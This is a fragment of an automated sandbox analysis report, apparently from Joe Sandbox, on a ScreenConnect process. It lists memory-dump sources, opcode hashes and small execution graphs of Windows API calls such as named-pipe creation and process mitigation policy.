                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 93e31b3228eedaa5c5290755fc62cceff9445057d7fb0bf3ece24f27d43bd520
                                                                                    • Instruction ID: 0b3b1576afb72b3ecc94c9ce51267a64210a8c1b2a53ad51dbbcbfac02deaa99
                                                                                    • Opcode Fuzzy Hash: 93e31b3228eedaa5c5290755fc62cceff9445057d7fb0bf3ece24f27d43bd520
                                                                                    • Instruction Fuzzy Hash: 1BF08C2180F3960FD36297B48865AA1BFF0AF47110B0E42EAD088CB5B3D90C59CA87A1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 48570bc20d5ffe290211bd4bf578f2c53a46a7a3b02a1fe59d528e2ce3a2fe51
                                                                                    • Instruction ID: d10f7fea2678bc0fc10947eebb86a4bceb224f2550de107f7ae3e0e28cdab1da
                                                                                    • Opcode Fuzzy Hash: 48570bc20d5ffe290211bd4bf578f2c53a46a7a3b02a1fe59d528e2ce3a2fe51
                                                                                    • Instruction Fuzzy Hash: B1F0303540D79C9FCB42EB64D4618D57BB0FF16320B0601C7E049CB062D6219A5ACB82
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e7d3227b1c49a7cda285bfe17cbe7b0d30117b40b703c1b406cbeb6f2da81a1b
                                                                                    • Instruction ID: c76eb7a288bb1013e95cc8f727349ff5505abd4e9ad1d8036d0e75e67a7bd583
                                                                                    • Opcode Fuzzy Hash: e7d3227b1c49a7cda285bfe17cbe7b0d30117b40b703c1b406cbeb6f2da81a1b
                                                                                    • Instruction Fuzzy Hash: A3E0D811A0F7C44FEB25A6799879CA43F50AF1621070942FED48A8B1F3E8059A84C711
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
Memory Dump Source
• Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Strings
Memory Dump Source
• Source File: 00000008.00000002.2973911873.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b410000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: 3L_^
• API String ID: 0-195740063
Memory Dump Source
• Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000008.00000002.2973911873.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b410000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Execution Graph

Execution Coverage: 11.5%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 14
Total number of Limit Nodes: 1

execution_graph
15467 7ffd9b3f8014
15468 7ffd9b3f801d
15467->15468
15469 7ffd9b3f8082
15468->15469
15470 7ffd9b3f80f6 SetProcessMitigationPolicy
15468->15470
15471 7ffd9b3f8152
15470->15471
15455 7ffd9b3f3662
15456 7ffd9b4161e0 ConnectNamedPipe
15455->15456
15458 7ffd9b416292
15456->15458
15463 7ffd9b3f3642
15464 7ffd9b416040 CreateNamedPipeW
15463->15464
15466 7ffd9b416173
15464->15466
15459 7ffd9b70906c
15460 7ffd9b70906f GlobalMemoryStatusEx
15459->15460
15462 7ffd9b709145
15460->15462

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000009.00000002.1816656648.00007FFD9B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ffd9b3f0000_ScreenConnect.jbxd
Similarity
• API ID: MitigationPolicyProcess
• String ID:
• API String ID: 1088084561-0

Control-flow Graph

• Executed
• Not Executed

control_flow_graph
143 7ffd9b3f3642-7ffd9b4160aa
146 7ffd9b4160b4-7ffd9b416171 CreateNamedPipeW
143->146
147 7ffd9b4160ac-7ffd9b4160b1
143->147
149 7ffd9b416173
146->149
150 7ffd9b416179-7ffd9b4161ac
146->150
147->146
149->150

APIs
Memory Dump Source
• Source File: 00000009.00000002.1816656648.00007FFD9B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ffd9b3f0000_ScreenConnect.jbxd
Similarity
• API ID: CreateNamedPipe
• String ID:
• API String ID: 2489174969-0

Control-flow Graph

• Executed
• Not Executed

control_flow_graph
214 7ffd9b70906c-7ffd9b7090b9
220 7ffd9b709133-7ffd9b709143 GlobalMemoryStatusEx
214->220
221 7ffd9b7090bb-7ffd9b709132
214->221
223 7ffd9b709145
220->223
224 7ffd9b70914b-7ffd9b709172
220->224
221->220
223->224

APIs
Memory Dump Source
• Source File: 00000009.00000002.1823407459.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ffd9b700000_ScreenConnect.jbxd
Similarity
• API ID: GlobalMemoryStatus
• String ID:
• API String ID: 1890195054-0

Control-flow Graph

• Executed
• Not Executed

control_flow_graph
226 7ffd9b3f3662-7ffd9b416290 ConnectNamedPipe
230 7ffd9b416292
226->230
231 7ffd9b416298-7ffd9b4162e0 call 7ffd9b4162e1
226->231
230->231

APIs
Memory Dump Source
• Source File: 00000009.00000002.1816656648.00007FFD9B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ffd9b3f0000_ScreenConnect.jbxd
Similarity
• API ID: ConnectNamedPipe
• String ID:
• API String ID: 2191148154-0

Control-flow Graph

• Executed
• Not Executed

control_flow_graph
235 7ffd9b3f3aa2-7ffd9b3f80ef
237 7ffd9b3f80f6-7ffd9b3f8150 SetProcessMitigationPolicy
235->237
238 7ffd9b3f8158-7ffd9b3f8187
237->238
239 7ffd9b3f8152
237->239
239->238

APIs
Memory Dump Source
• Source File: 00000009.00000002.1816656648.00007FFD9B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ffd9b3f0000_ScreenConnect.jbxd
Similarity
• API ID: MitigationPolicyProcess
• String ID:
• API String ID: 1088084561-0